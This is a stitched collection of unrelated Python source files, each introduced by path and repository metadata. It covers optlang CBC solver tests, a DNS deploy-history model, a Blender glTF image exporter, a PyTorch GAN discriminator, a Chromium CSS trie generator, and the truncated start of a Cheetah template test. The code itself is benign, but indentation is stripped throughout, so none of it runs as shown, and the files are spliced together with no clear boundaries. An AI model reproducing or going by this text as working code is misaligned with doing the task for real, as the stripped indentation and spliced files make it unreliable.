import sys
try:
import mip
except ImportError as e:
if str(e).find('mip') >= 0:
class TestMissingDependency(unittest.TestCase):
@unittest.skip('Missing dependency - ' + str(e))
def test_fail(self):
pass
else:
raise
else:
from optlang import coinor_cbc_interface
from optlang.tests import abstract_test_cases
TESTMODELPATH = os.path.join(os.path.dirname(__file__), 'data/coli_core.json')
def same_ex(ex1, ex2):
"""Compare to expressions for mathematical equality."""
return ex1.simplify() == ex2.simplify()
class VariableTestCase(abstract_test_cases.AbstractVariableTestCase):
interface = coinor_cbc_interface
def test_get_primal(self):
self.assertEqual(self.var.primal, None)
with open(TESTMODELPATH) as infile:
model = self.interface.Model.from_json(json.load(infile))
model.optimize()
self.assertEqual(model.status, optlang.interface.OPTIMAL)
for var in model.variables:
self.assertTrue(var.lb <= round(var.primal, 6) <= var.ub, (var.lb, var.primal, var.ub))
@unittest.skip("COIN-OR Cbc doesn't support variable name change")
def test_changing_variable_names_is_reflected_in_the_solver(self):
pass
@unittest.skip("COIN-OR Cbc doesn't support variable name change")
def test_change_name(self):
pass
def test_set_wrong_type_raises(self):
self.assertRaises(ValueError, self.interface.Variable, name="test", type="mayo")
self.assertRaises(Exception, setattr, self.var, 'type', 'ketchup')
self.model.add(self.var)
self.model.update()
self.assertRaises(ValueError, setattr, self.var, "type", "mustard")
def test_change_type(self):
self.var.type = "continuous"
self.assertEqual(self.var.lb, None)
self.assertEqual(self.var.ub, None)
self.var.type = "integer"
self.assertEqual(self.var.lb, None)
self.assertEqual(self.var.ub, None)
self.var.type = "binary"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.type = "integer"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.type = "continuous"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.lb = -1.4
self.var.ub = 1.6
self.var.type = "integer"
self.assertEqual(self.var.lb, -1)
self.assertEqual(self.var.ub, 2)
class ConstraintTestCase(abstract_test_cases.AbstractConstraintTestCase):
interface = coinor_cbc_interface
def test_get_primal(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
self.assertEqual(self.constraint.primal, None)
self.model.optimize()
for c in self.model.constraints:
if c.lb is not None:
self.assertTrue(c.lb <= round(c.primal, 6))
if c.ub is not None:
self.assertTrue(round(c.primal, 6) <= c.ub)
@unittest.skip("COIN-OR Cbc doesn't support constraint name change")
def test_change_constraint_name(self):
pass
@unittest.skip("TODO: Currently not supported")
def test_indicator_constraint_support(self):
pass
class ObjectiveTestCase(abstract_test_cases.AbstractObjectiveTestCase):
interface = coinor_cbc_interface
def setUp(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
self.obj = self.model.objective
def test_change_direction(self):
from mip import MAXIMIZE, MINIMIZE
self.obj.direction = "min"
self.assertEqual(self.obj.direction, "min")
self.assertEqual(self.model.problem.sense, MINIMIZE)
self.obj.direction = "max"
self.assertEqual(self.obj.direction, "max")
self.assertEqual(self.model.problem.sense, MAXIMIZE)
class ConfigurationTestCase(abstract_test_cases.AbstractConfigurationTestCase):
interface = coinor_cbc_interface
class ModelTestCase(abstract_test_cases.AbstractModelTestCase):
interface = coinor_cbc_interface
def setUp(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
def test_pickle_ability(self):
self.model.optimize()
value = self.model.objective.value
pickle_string = pickle.dumps(self.model)
from_pickle = pickle.loads(pickle_string)
from_pickle.optimize()
self.assertAlmostEqual(value, from_pickle.objective.value)
self.assertEqual([(var.lb, var.ub, var.name, var.type) for var in from_pickle.variables.values()],
[(var.lb, var.ub, var.name, var.type) for var in self.model.variables.values()])
self.assertEqual([(constr.lb, constr.ub, constr.name) for constr in from_pickle.constraints],
[(constr.lb, constr.ub, constr.name) for constr in self.model.constraints])
def test_config_gets_copied_too(self):
self.assertEqual(self.model.configuration.verbosity, 0)
self.model.configuration.verbosity = 3
model_copy = copy.copy(self.model)
self.assertEqual(model_copy.configuration.verbosity, 3)
def test_init_from_existing_problem(self):
self.assertEqual(len(self.model.variables), len(self.model.problem.vars))
# Divide by 2 because upper and lower constraints are represented separately
self.assertEqual(len(self.model.constraints), len(self.model.problem.constrs) / 2)
self.assertEqual(self.model.variables.keys(),
[var.name[2:] for var in self.model.problem.vars])
# Collect _lower and _upper constraints
constrs = []
for con in self.model.constraints:
constrs.append(con.constraint_name(True))
constrs.append(con.constraint_name(False))
self.assertEqual(constrs, [constr.name for constr in self.model.problem.constrs])
def test_add_non_cplex_conform_variable(self):
var = self.interface.Variable('12x!!@#5_3', lb=-666, ub=666)
self.model.add(var)
self.assertTrue(var in self.model.variables.values())
self.assertEqual(self.model.variables['12x!!@#5_3'].lb, -666)
self.assertEqual(self.model.variables['12x!!@#5_3'].ub, 666)
repickled = pickle.loads(pickle.dumps(self.model))
var_from_pickle = repickled.variables['12x!!@#5_3']
self.assertTrue('v_' + var_from_pickle.name in [var.name for var in self.model.problem.vars])
@unittest.skip("COIN-OR Cbc doesn't support constraint name change")
def test_change_constraint_name(self):
pass
def test_clone_model_with_lp(self):
self.assertEqual(self.model.configuration.verbosity, 0)
self.model.configuration.verbosity = 3
self.model.optimize()
opt = self.model.objective.value
cloned_model = self.interface.Model.clone(self.model, use_lp=True)
self.assertEqual(cloned_model.configuration.verbosity, 3)
self.assertEqual(len(cloned_model.variables), len(self.model.variables))
for var in self.model.variables:
self.assertTrue(var.name in cloned_model.variables)
var_clone = cloned_model.variables[var.name]
self.assertEqual(var_clone.lb, var.lb)
self.assertEqual(var_clone.ub, var.ub)
self.assertEqual(len(cloned_model.constraints), len(self.model.constraints))
for con in self.model.constraints:
self.assertTrue(con.name in cloned_model.constraints)
con_clone = cloned_model.constraints[con.name]
self.assertEqual(con_clone.lb, con.lb)
self.assertEqual(con_clone.ub, con.ub)
cloned_model.optimize()
self.assertAlmostEqual(cloned_model.objective.value, opt)
def test_clone_small_model_with_lp(self):
x1 = self.interface.Variable('x1', lb=0)
x2 = self.interface.Variable('x2', lb=0)
x3 = self.interface.Variable('x3', lb=0)
# A constraint is constructed from an expression of variables and a lower and/or upper bound (lb and ub).
c1 = self.interface.Constraint(x1 + x2 + x3, ub=100, name='c1')
c2 = self.interface.Constraint(10 * x1 + 4 * x2 + 5 * x3, ub=600, name='c2')
c3 = self.interface.Constraint(2 * x1 + 2 * x2 + 6 * x3, ub=300, name='c3')
# An objective can be formulated
obj = self.interface.Objective(10 * x1 + 6 * x2 + 4 * x3, direction='max')
# Variables, constraints and objective are combined in a Model object, which can subsequently be optimized.
model = self.interface.Model(name='Simple model')
model.objective = obj
model.add([c1, c2, c3])
model.update()
self.assertEqual(model.configuration.verbosity, 0)
model.configuration.verbosity = 3
model.optimize()
opt = model.objective.value
cloned_model = self.interface.Model.clone(model, use_lp=True)
self.assertEqual(cloned_model.configuration.verbosity, 3)
self.assertEqual(len(cloned_model.variables), len(model.variables))
for var in model.variables:
self.assertTrue(var.name in cloned_model.variables)
var_clone = cloned_model.variables[var.name]
self.assertEqual(var_clone.lb, var.lb)
self.assertEqual(var_clone.ub, var.ub)
self.assertEqual(len(cloned_model.constraints), len(model.constraints))
for con in model.constraints:
self.assertTrue(con.name in cloned_model.constraints)
con_clone = cloned_model.constraints[con.name]
self.assertEqual(con_clone.lb, con.lb)
self.assertEqual(con_clone.ub, con.ub)
cloned_model.optimize()
self.assertAlmostEqual(cloned_model.objective.value, opt)
def test_change_of_constraint_is_reflected_in_low_level_solver(self):
x = self.interface.Variable('x', lb=0, ub=1, type='continuous')
y = self.interface.Variable('y', lb=-181133.3, ub=12000., type='continuous')
z = self.interface.Variable('z', lb=0., ub=10., type='continuous')
constr1 = self.interface.Constraint(0.3 * x + 0.4 * y + 66. * z, lb=-100, ub=0., name='test')
self.model.add(constr1)
self.model.update()
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 100)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 0)
constr1.lb = -9
constr1.ub = 10
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 9)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 10)
self.model.optimize()
constr1.lb = -90
constr1.ub = 100
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 90)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 100)
def test_constraint_set_problem_to_None_caches_the_latest_expression_from_solver_instance(self):
x = self.interface.Variable('x', lb=-83.3, ub=1324422.)
y = self.interface.Variable('y', lb=-181133.3, ub=12000.)
constraint = self.interface.Constraint(0.3 * x + 0.4 * y, lb=-100, name='test')
self.model.add(constraint)
z = self.interface.Variable('z', lb=2, ub=5, type='integer')
constraint += 77. * z
self.model.remove(constraint)
self.assertEqual(
(constraint.expression - (0.4 * y + 0.3 * x + 77.0 * z)).expand() - 0, 0
)
self.assertEqual(constraint.lb, -100)
self.assertEqual(constraint.ub, None)
def test_change_of_objective_is_reflected_in_low_level_solver(self):
x = self.interface.Variable('x', lb=-83.3, ub=1324422.)
y = self.interface.Variable('y', lb=-181133.3, ub=12000.)
objective = self.interface.Objective(0.3 * x + 0.4 * y, name='test', direction='max')
self.model.objective = objective
self.model.update()
grb_x = self.model.problem.var_by_name('v_' + x.name)
grb_y = self.model.problem.var_by_name('v_' + y.name)
expected = {grb_x: 0.3, grb_y: 0.4}
self.assertEqual(self.model.problem.objective.expr, expected)
z = self.interface.Variable('z', lb=4, ub=4, type='integer')
self.model.objective += 77. * z
self.model.update()
grb_z = self.model.problem.var_by_name('v_' + z.name)
expected[grb_z] = 77.
self.assertEqual(self.model.problem.objective.expr, expected)
def test_change_variable_bounds(self):
import random
inner_prob = self.model.problem
inner_problem_bounds = [(var.lb, var.ub) for var in inner_prob.vars]
bounds = [(var.lb, var.ub) for var in self.model.variables.values()]
self.assertEqual(bounds, inner_problem_bounds)
for var in self.model.variables.values():
var.ub = random.uniform(var.lb, 1000)
var.lb = random.uniform(-1000, var.ub)
self.model.update()
inner_problem_bounds_new = [(var.lb, var.ub) for var in inner_prob.vars]
bounds_new = [(var.lb, var.ub) for var in self.model.variables.values()]
self.assertNotEqual(bounds, bounds_new)
self.assertNotEqual(inner_problem_bounds, inner_problem_bounds_new)
self.assertEqual(bounds_new, inner_problem_bounds_new)
def test_change_constraint_bounds(self):
constraint = self.model.constraints[0]
value = 42
constraint.ub = value
self.assertEqual(constraint.ub, value)
constraint.lb = value
self.assertEqual(constraint.lb, value)
name = constraint.name
self.assertEqual(self.model.problem.constr_by_name('c_' + name + '_upper').rhs, value)
self.assertEqual(self.model.problem.constr_by_name('c_' + name + '_lower').rhs, -1*value)
def test_initial_objective(self):
self.assertIn('BIOMASS_Ecoli_core_w_GAM', self.model.objective.expression.__str__(), )
self.assertEqual(
(self.model.objective.expression - (
1.0 * self.model.variables.BIOMASS_Ecoli_core_w_GAM -
1.0 * self.model.variables.BIOMASS_Ecoli_core_w_GAM_reverse_712e5)).expand() - 0, 0
)
def test_change_objective(self):
v1, v2 = self.model.variables.values()[0:2]
self.model.objective = self.interface.Objective(1. * v1 + 1. * v2)
self.assertIn(v1.name, str(self.model.objective))
self.assertIn(v2.name, str(self.model.objective))
self.assertTrue(same_ex(self.model.objective._expression, 1.*v1 + 1.*v2))
self.model.objective = self.interface.Objective(v1 + v2)
self.assertIn(v1.name, str(self.model.objective))
self.assertIn(v2.name, str(self.model.objective))
self.assertTrue(same_ex(self.model.objective._expression, 1.*v1 + 1.*v2))
def test_iadd_objective(self):
v2, v3 = self.model.variables.values()[1:3]
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-1.0, 1.0])
self.model.objective += 2. * v2 - 3. * v3
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-3.0, -1.0, 1.0, 2.0])
def test_imul_objective(self):
self.model.objective *= 2.
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-2.0, 2.0])
v2, v3 = self.model.variables.values()[1:3]
self.model.objective += 4. * v2 - 3. * v3
self.model.objective *= 3.
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-9.0, -6.0, 6.0, 12.0])
self.model.objective *= -1
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-12.0, -6.0, 6.0, 9.0])
def test_set_copied_objective(self):
mip_expr= self.model.problem.objective.expr
obj_copy = copy.copy(self.model.objective)
self.model.objective = obj_copy
self.assertEqual(self.model.objective.direction, "max")
self.assertEqual(mip_expr, self.model.problem.objective.expr)
@unittest.skip("CBC-MIP timeout is flaky around 0")
def test_timeout(self):
pass
def test_set_linear_coefficients_objective(self):
self.model.objective.set_linear_coefficients({self.model.variables.BIOMASS_Ecoli_core_w_GAM: 666.})
var = self.model.problem.var_by_name('v_' + self.model.variables.BIOMASS_Ecoli_core_w_GAM.name)
self.assertEqual(self.model.problem.objective.expr[var], 666.)
def test_set_linear_coefficients_constraint(self):
constraint = self.model.constraints[0]
coeff_dict = constraint.expression.as_coefficients_dict()
self.assertEqual(coeff_dict[self.model.variables.GAPD_reverse_459c1], -1.0)
constraint.set_linear_coefficients({self.model.variables.GAPD_reverse_459c1: 666.})
coeff_dict = constraint.expression.as_coefficients_dict()
self.assertEqual(coeff_dict[self.model.variables.GAPD_reverse_459c1], 666.)
def test_coinor_cbc_coefficient_dict(self):
x = self.interface.Variable("x")
c = self.interface.Constraint(2 ** x, lb=0, sloppy=True)
obj = self.interface.Objective(2 ** x, sloppy=True)
model = self.interface.Model()
self.assertRaises(Exception, setattr, model, "objective", obj)
self.assertRaises(Exception, model._add_constraint, c)
c = self.interface.Constraint(0, lb=0)
obj = self.interface.Objective(0)
model.add(c)
model.objective = obj
self.assertEqual(model.optimize(), optlang.interface.OPTIMAL)
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_variable_dual(self):
from functools import partial
model = self.interface.Model()
x = self.interface.Variable("x", lb=0)
y = self.interface.Variable("y", lb=0)
c = self.interface.Constraint(x + y, ub=1)
model.add(c)
model.objective = self.interface.Objective(x)
model.optimize()
self.assertEqual(y.dual, -1)
x.type = "integer"
model.optimize()
# TODO: investigate. abstract test case has y. What should the
# behavior be?
self.assertRaises(ValueError, partial(getattr, x, "dual"))
x.type = "continuous"
model.optimize()
self.assertEqual(y.dual, -1)
self.assertEqual(x.dual, 0)
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_constraint_dual(self):
pass
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_batch_duals(self):
pass
def test_relax_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.relax = True
status = model.optimize()
self.assertTrue(model.problem.relax)
self.assertEqual(model.status, 'optimal')
self.assertTrue(model.objective.value >= 41.0)
def test_max_nodes_max_solutions_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.max_nodes = 0
model.configuration.max_solutions = 0
status = model.optimize()
self.assertEqual(model.problem.max_nodes, 0)
self.assertEqual(model.problem.max_solutions, 0)
self.assertEqual(model.status, 'feasible')
model.configuration.max_solutions = 10
status = model.optimize()
self.assertEqual(model.problem.max_solutions, 10)
self.assertEqual(model.status, 'optimal')
def test_threads_cuts_emphasis_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.threads = -1
model.configuration.cuts = 1
model.configuration.emphasis = 2
status = model.optimize()
self.assertEqual(model.problem.threads, -1)
self.assertEqual(model.problem.cuts, 1)
self.assertEqual(model.problem.emphasis, 2)
self.assertEqual(model.status, 'optimal')
class MIPExamples(unittest.TestCase):
interface = coinor_cbc_interface
def test_constant_objective(self):
x1 = self.interface.Variable('x1', lb=0, ub=5)
c1 = self.interface.Constraint(x1, lb=-10, ub=10, name='c1')
obj = self.interface.Objective(1)
model = self.interface.Model()
model.objective = obj
model.add(c1)
model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 1.0)
def test_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
status = model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 41.0)
primal_values = [val for val in model.primal_values.values()]
self.assertEqual(primal_values, [1, 0, 0, 1, 0, 0])
selected = [i for i in I if x[i].primal >= 0.99]
self.assertEqual(selected, [0, 3])
def test_travelling_salesman(self):
from itertools import product
# names of places to visit
places = ['Antwerp', 'Bruges', 'C-Mine', 'Dinant', 'Ghent',
'Grand-Place de Bruxelles', 'Hasselt', 'Leuven',
'Mechelen', 'Mons', 'Montagne de Bueren', 'Namur',
'Remouchamps', 'Waterloo']
# distances in an upper triangular matrix
dists = [[83, 81, 113, 52, 42, 73, 44, 23, 91, 105, 90, 124, 57],
[161, 160, 39, 89, 151, 110, 90, 99, 177, 143, 193, 100],
[90, 125, 82, 13, 57, 71, 123, 38, 72, 59, 82],
[123, 77, 81, 71, 91, 72, 64, 24, 62, 63],
[51, 114, 72, 54, 69, 139, 105, 155, 62],
[70, 25, 22, 52, 90, 56, 105, 16],
[45, 61, 111, 36, 61, 57, 70],
[23, 71, 67, 48, 85, 29],
[74, 89, 69, 107, 36],
[117, 65, 125, 43],
[54, 22, 84],
[60, 44],
[97],
[]]
# number of nodes and list of vertices
n, V = len(dists), set(range(len(dists)))
# distances matrix
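# (only the strictly upper triangle is stored above, so for j > i the
# distance between i and j is found at dists[i][j-i-1]; the comprehension
# below expands it into a full symmetric matrix with a zero diagonal)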
c = [[0 if i == j
else dists[i][j-i-1] if j > i
else dists[j][i-j-1]
for j in V] for i in V]
# binary variables indicating if arc (i,j) is used on the route or not
x = [[self.interface.Variable(type='binary', name='x_i={}_j={}_arc'.format(i, j)) for j in V] for i in V]
# continuous variable to prevent subtours: each city will have a
# different sequential id in the planned route except the first one
y = [self.interface.Variable(name='x{}'.format(i)) for i in V]
# objective function: minimize the distance
obj = self.interface.Objective(sum(c[i][j]*x[i][j] for i in V for j in V), direction='min')
# constraint : leave each city only once
cons = []
for i in V:
cons.append(self.interface.Constraint(sum(x[i][j] for j in V - {i}), lb=1, ub=1))
# constraint : enter each city only once
for i in V:
cons.append(self.interface.Constraint(sum(x[j][i] for j in V - {i}), lb=1, ub=1))
# subtour elimination
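# (Miller-Tucker-Zemlin style: if arc (i, j) is used, the sequence
# variables y[i] and y[j] must differ by at least 1, which makes any
# subtour that does not pass through the first city infeasible)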
for (i, j) in product(V - {0}, V - {0}):
if i != j:
cons.append(self.interface.Constraint(y[i] - (n+1)*x[i][j] - y[j], lb=-1*n))
model = self.interface.Model(name='travelling_salesman')
model.objective = obj
model.add(cons)
model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 547.0)
|
dnsdb_common/dal/models/deploy_history.py
|
baiyongjie/open_dnsdb
| 378 |
121874
|
<reponame>baiyongjie/open_dnsdb<filename>dnsdb_common/dal/models/deploy_history.py
# -*- coding: utf-8 -*-
from . import AuditTimeMixin
from .. import db
class DeployHistory(db.Model, AuditTimeMixin):
__tablename__ = 'tb_deploy_history'
id = db.Column(db.Integer, primary_key=True)
rtx_id = db.Column(db.String(50), nullable=False)
deploy_desc = db.Column(db.Text, nullable=False)
state = db.Column(db.String(50), nullable=False)
|
blendergltf/exporters/image.py
|
iamthad/blendergltf
| 343 |
121880
|
<reponame>iamthad/blendergltf<gh_stars>100-1000
import base64
import os
import struct
import zlib
import bpy
from .base import BaseExporter
from .common import (
Buffer,
Reference,
SimpleID,
)
EXT_MAP = {'BMP': 'bmp', 'JPEG': 'jpg', 'PNG': 'png', 'TARGA': 'tga'}
class ImageExporter(BaseExporter):
gltf_key = 'images'
blender_key = 'images'
@classmethod
def check(cls, state, blender_data):
errors = []
if blender_data.size[0] == 0:
errors.append('x dimension is 0')
if blender_data.size[1] == 0:
errors.append('y dimension is 0')
if blender_data.type != 'IMAGE':
errors.append('not an image {}'.format(blender_data.type))
if errors:
err_list = '\n\t'.join(errors)
print(
'Unable to export image {} due to the following errors:\n\t{}'
.format(blender_data.name, err_list)
)
return False
return True
@classmethod
def default(cls, state, blender_data):
return {
'name': blender_data.name,
'uri': ''
}
@classmethod
def image_to_data_uri(cls, image):
width = image.size[0]
height = image.size[1]
buf = bytearray([int(p * 255) for p in image.pixels])
# reverse the vertical line order and add null bytes at the start
width_byte_4 = width * 4
raw_data = b''.join(b'\x00' + buf[span:span + width_byte_4]
for span in range((height - 1) * width_byte_4, -1, - width_byte_4))
def png_pack(png_tag, data):
chunk_head = png_tag + data
return (struct.pack("!I", len(data)) +
chunk_head +
struct.pack("!I", 0xFFFFFFFF & zlib.crc32(chunk_head)))
png_bytes = b''.join([
b'\x89PNG\r\n\x1a\n',
png_pack(b'IHDR', struct.pack("!2I5B", width, height, 8, 6, 0, 0, 0)),
png_pack(b'IDAT', zlib.compress(raw_data, 9)),
png_pack(b'IEND', b'')])
return png_bytes
@classmethod
def export(cls, state, blender_data):
path = ''
data = None
gltf = {'name': blender_data.name}
storage_setting = state['settings']['images_data_storage']
image_packed = blender_data.packed_file is not None
if image_packed and storage_setting in ['COPY', 'REFERENCE']:
if blender_data.file_format in EXT_MAP:
# save the file to the output directory
gltf['uri'] = '.'.join([blender_data.name, EXT_MAP[blender_data.file_format]])
temp = blender_data.filepath
blender_data.filepath = os.path.join(
state['settings']['gltf_output_dir'],
gltf['uri']
)
blender_data.save()
with open(bpy.path.abspath(blender_data.filepath), 'rb') as fin:
data = fin.read()
blender_data.filepath = temp
else:
# convert to png and save
gltf['uri'] = '.'.join([blender_data.name, 'png'])
data = cls.image_to_data_uri(blender_data)
path = os.path.join(state['settings']['gltf_output_dir'], gltf['uri'])
elif storage_setting == 'COPY':
with open(bpy.path.abspath(blender_data.filepath), 'rb') as fin:
data = fin.read()
gltf['uri'] = bpy.path.basename(blender_data.filepath)
path = os.path.join(state['settings']['gltf_output_dir'], gltf['uri'])
elif storage_setting == 'REFERENCE':
gltf['uri'] = blender_data.filepath.replace('//', '')
elif storage_setting == 'EMBED':
png_bytes = cls.image_to_data_uri(blender_data)
gltf['mimeType'] = 'image/png'
if state['settings']['gltf_export_binary']:
buf = Buffer(blender_data.name)
view_key = buf.add_view(len(png_bytes), 0, None)
view = buf.buffer_views[view_key]
view['data'] = png_bytes
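# keep the binary buffer 4-byte aligned (GLB data is expected to be padded
# to 4-byte boundaries), so append a small padding view when the PNG
# length is not a multiple of 4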
pad = 4 - len(png_bytes) % 4
if pad not in [0, 4]:
buf.add_view(pad, 0, None)
gltf['bufferView'] = Reference('bufferViews', view_key, gltf, 'bufferView')
state['references'].append(gltf['bufferView'])
state['buffers'].append(buf)
state['input']['buffers'].append(SimpleID('buffer_' + blender_data.name))
else:
gltf['uri'] = 'data:image/png;base64,' + base64.b64encode(png_bytes).decode()
else:
print(
'Encountered unknown option ({}) for images_data_storage setting'
.format(storage_setting)
)
if path:
state['files'][path] = data
return gltf
|
models/discriminator.py
|
tjtanaa/ml-gsn
| 202 |
121919
|
import math
import torch
import torch.nn as nn
from .layers import ConvLayer2d, ConvResBlock2d, EqualLinear
class DiscriminatorHead(nn.Module):
def __init__(self, in_channel, disc_stddev=False):
super().__init__()
self.disc_stddev = disc_stddev
stddev_dim = 1 if disc_stddev else 0
self.conv_stddev = ConvLayer2d(
in_channel=in_channel + stddev_dim, out_channel=in_channel, kernel_size=3, activate=True
)
self.final_linear = nn.Sequential(
nn.Flatten(),
EqualLinear(in_channel=in_channel * 4 * 4, out_channel=in_channel, activate=True),
EqualLinear(in_channel=in_channel, out_channel=1),
)
def cat_stddev(self, x, stddev_group=4, stddev_feat=1):
perm = torch.randperm(len(x))
inv_perm = torch.argsort(perm)
batch, channel, height, width = x.shape
x = x[perm] # shuffle inputs so that all views in a single trajectory don't get put together
group = min(batch, stddev_group)
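# minibatch standard deviation (as used in StyleGAN-style discriminators):
# compute the std of features within each group and append it as an extra
# channel so the discriminator can detect low sample diversity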
stddev = x.view(group, -1, stddev_feat, channel // stddev_feat, height, width)
stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8)
stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2)
stddev = stddev.repeat(group, 1, height, width)
stddev = stddev[inv_perm] # reorder inputs
x = x[inv_perm]
out = torch.cat([x, stddev], 1)
return out
def forward(self, x):
if self.disc_stddev:
x = self.cat_stddev(x)
x = self.conv_stddev(x)
out = self.final_linear(x)
return out
class ConvDecoder(nn.Module):
def __init__(self, in_channel, out_channel, in_res, out_res):
super().__init__()
log_size_in = int(math.log(in_res, 2))
log_size_out = int(math.log(out_res, 2))
self.layers = []
in_ch = in_channel
for i in range(log_size_in, log_size_out):
out_ch = in_ch // 2
self.layers.append(
ConvLayer2d(
in_channel=in_ch, out_channel=out_ch, kernel_size=3, upsample=True, bias=True, activate=True
)
)
in_ch = out_ch
self.layers.append(
ConvLayer2d(in_channel=in_ch, out_channel=out_channel, kernel_size=3, bias=True, activate=False)
)
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
return self.layers(x)
class StyleDiscriminator(nn.Module):
def __init__(self, in_channel, in_res, ch_mul=64, ch_max=512, **kwargs):
super().__init__()
log_size_in = int(math.log(in_res, 2))
log_size_out = int(math.log(4, 2))
self.conv_in = ConvLayer2d(in_channel=in_channel, out_channel=ch_mul, kernel_size=3)
# each resblock will half the resolution and double the number of features (until a maximum of ch_max)
self.layers = []
in_channels = ch_mul
for i in range(log_size_in, log_size_out, -1):
out_channels = int(min(in_channels * 2, ch_max))
self.layers.append(ConvResBlock2d(in_channel=in_channels, out_channel=out_channels, downsample=True))
in_channels = out_channels
self.layers = nn.Sequential(*self.layers)
self.disc_out = DiscriminatorHead(in_channel=in_channels, disc_stddev=True)
self.decoder = ConvDecoder(in_channel=in_channels, out_channel=in_channel, in_res=4, out_res=in_res)
def forward(self, x):
x = self.conv_in(x)
x = self.layers(x)
out = self.disc_out(x)
recon = self.decoder(x)
return out, recon
|
third_party/WebKit/Source/build/scripts/make_css_primitive_value_unit_trie.py
|
google-ar/chromium
| 777 |
121941
|
<gh_stars>100-1000
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import in_generator
import trie_builder
import template_expander
class UnitTrieWriter(in_generator.Writer):
defaults = {
'unit_type': None
}
def __init__(self, in_file_paths):
super(UnitTrieWriter, self).__init__(in_file_paths)
self._units = {entry['name']: entry['unit_type'] for entry in self.in_file.name_dictionaries}
self._outputs = {
'CSSPrimitiveValueUnitTrie.cpp': self.generate_implementation
}
@template_expander.use_jinja('CSSPrimitiveValueUnitTrie.cpp.tmpl')
def generate_implementation(self):
return {
'length_tries': trie_builder.trie_list_by_str_length(self._units)
}
if __name__ == '__main__':
in_generator.Maker(UnitTrieWriter).main(sys.argv)
|
Cheetah/Tests/Unicode.py
|
yegorich/cheetah3
| 111 |
121966
|
<filename>Cheetah/Tests/Unicode.py
# -*- encoding: utf8 -*-
from glob import glob
import os
from shutil import rmtree
import tempfile
import unittest
from Cheetah.Compiler import Compiler
from Cheetah.Template import Template
from Cheetah import CheetahWrapper
from Cheetah.compat import PY2, unicode, load_module_from_file
class CommandLineTest(unittest.TestCase):
def createAndCompile(self, source):
fd, sourcefile = tempfile.mkstemp()
os.close(fd)
os.remove(sourcefile)
sourcefile = sourcefile.replace('-', '_')
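# '-' is not valid in a Python identifier, so normalise the temp name
# before it is compiled and imported as a module below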
if PY2:
fd = open('%s.tmpl' % sourcefile, 'w')
else:
fd = open('%s.tmpl' % sourcefile, 'w', encoding='utf-8')
fd.write(source)
fd.close()
wrap = CheetahWrapper.CheetahWrapper()
wrap.main(['cheetah', 'compile',
'--encoding=utf-8', '--settings=encoding="utf-8"',
'--quiet', '--nobackup', sourcefile])
module_name = os.path.split(sourcefile)[1]
module = load_module_from_file(
module_name, module_name, sourcefile + '.py')
template = getattr(module, module_name)
os.remove('%s.tmpl' % sourcefile)
for sourcefile_py in glob('%s.py*' % sourcefile): # *.py[co]
os.remove(sourcefile_py)
__pycache__ = os.path.join(os.path.dirname(sourcefile), '__pycache__')
if os.path.exists(__pycache__): # PY3
rmtree(__pycache__)
return template
class JBQ_UTF8_Test1(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
